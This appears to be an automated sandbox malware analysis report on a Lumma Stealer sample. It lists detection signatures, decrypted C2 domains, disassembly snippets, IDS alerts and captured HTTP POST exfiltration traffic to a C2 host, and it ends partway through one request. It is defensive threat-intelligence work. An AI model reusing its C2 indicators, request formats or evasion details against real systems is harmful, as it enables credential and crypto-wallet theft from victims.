Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546641
MD5: 6fdf2cdf68ab1880aa76e7938e241fa3
SHA1: affc9a0aea771ad101357cc728951f5938b5e4e6
SHA256: e61ce90df13402909985f5312fdef798736eb10e0b5b6b280fb826538e7a597a
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

Source: 36.2.MSBuild.exe.400000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["goalyfeastz.site", "dilemmadu.site", "seallysl.site", "authorisev.site", "contemteny.site", "faulteyotk.site", "opposezmny.site", "servicedny.site"], "Build id": "MkfS5f--"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 95.8% probability
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: servicedny.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: authorisev.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: faulteyotk.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: dilemmadu.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: contemteny.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: goalyfeastz.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: opposezmny.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: seallysl.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: authorisev.site
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000023.00000002.2228311114.0000000003D3C000.00000004.00001000.00020000.00000000.sdmp String decryptor: MkfS5f--
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 36_2_0041D5AF CryptUnprotectData, 36_2_0041D5AF
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdb source: file.exe, is-E0D1D.tmp.3.dr
Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdbz source: file.exe, is-E0D1D.tmp.3.dr
Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_00B8E180
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_00B9A187
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_00B9A2E4
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 35_2_00B9A66E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9686D FindFirstFileW,FindNextFileW,FindClose, 35_2_00B9686D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E9BA GetFileAttributesW,FindFirstFileW,FindClose, 35_2_00B8E9BA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B974F0 FindFirstFileW,FindClose, 35_2_00B974F0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B97591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 35_2_00B97591
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_00B8DE32
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F50B5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 35_2_013F50B5
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F51BD FindFirstFileA,GetLastError, 35_2_013F51BD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F29E5 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 35_2_013F29E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h] 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], dl 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h] 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [eax] 36_2_004441F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_0044137E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_004413D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp eax 36_2_0041D5AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, eax 36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [eax+ebx*8], 7CDE1E50h 36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h 36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], cl 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ecx, eax 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then lea edx, dword ptr [eax-80h] 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch] 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh] 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esi+04h], eax 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], al 36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [eax+ebx], 30303030h 36_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [eax+ebx], 20202020h 36_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h 36_2_0043B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h] 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], dl 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h] 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, ecx 36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp edx 36_2_004431D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_004431D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-7DC9E524h] 36_2_004241E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp edx 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp edx 36_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [eax+ebx], 00000030h 36_2_004012D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ecx, ebx 36_2_00421333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [eax] 36_2_00444380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp edx 36_2_004433B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_004433B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 36_2_0042E400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch] 36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh] 36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esi+04h], eax 36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], al 36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebx, eax 36_2_0040D500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [ebx], ax 36_2_0041F510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [esi], cl 36_2_0041F510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-67BC38F0h] 36_2_00441648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 36_2_0043C6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 36_2_0041C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+52B71DE2h] 36_2_00441720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_00443720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h] 36_2_0043F7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then add ebp, dword ptr [esp+0Ch] 36_2_0042E870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [edi+ebx] 36_2_00405820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 36_2_0041C8CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ecx, eax 36_2_0040E8D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [edx+esi] 36_2_0040C960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ecx, eax 36_2_0040E996
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp eax 36_2_0042AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch] 36_2_0042AA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 36_2_0042CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 36_2_0042CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh] 36_2_0043FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edi, edx 36_2_00421B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp al, 2Eh 36_2_0042AC04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edi, esi 36_2_0041ECDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 36_2_00437CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 36_2_0042DE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp+3Ch], 595A5B84h 36_2_00440E3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edi, dword ptr [esp+54h] 36_2_0042CEDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp edx 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 36_2_00425F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, word ptr [edx] 36_2_00428F00

Networking

Source: Network traffic Suricata IDS: 2057071 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site) : 192.168.2.4:51868 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49743 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49755 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49777 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49749 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49766 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2057072 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI) : 192.168.2.4:49793 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49766 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49793 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49777 -> 104.21.85.194:443
Source: Malware configuration extractor URLs: goalyfeastz.site
Source: Malware configuration extractor URLs: dilemmadu.site
Source: Malware configuration extractor URLs: seallysl.site
Source: Malware configuration extractor URLs: authorisev.site
Source: Malware configuration extractor URLs: contemteny.site
Source: Malware configuration extractor URLs: faulteyotk.site
Source: Malware configuration extractor URLs: opposezmny.site
Source: Malware configuration extractor URLs: servicedny.site
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.85.194:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49793 -> 104.21.85.194:443
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: authorisev.site
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 42
    Host: authorisev.site
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18158
    Host: authorisev.site
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8779
    Host: authorisev.site
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
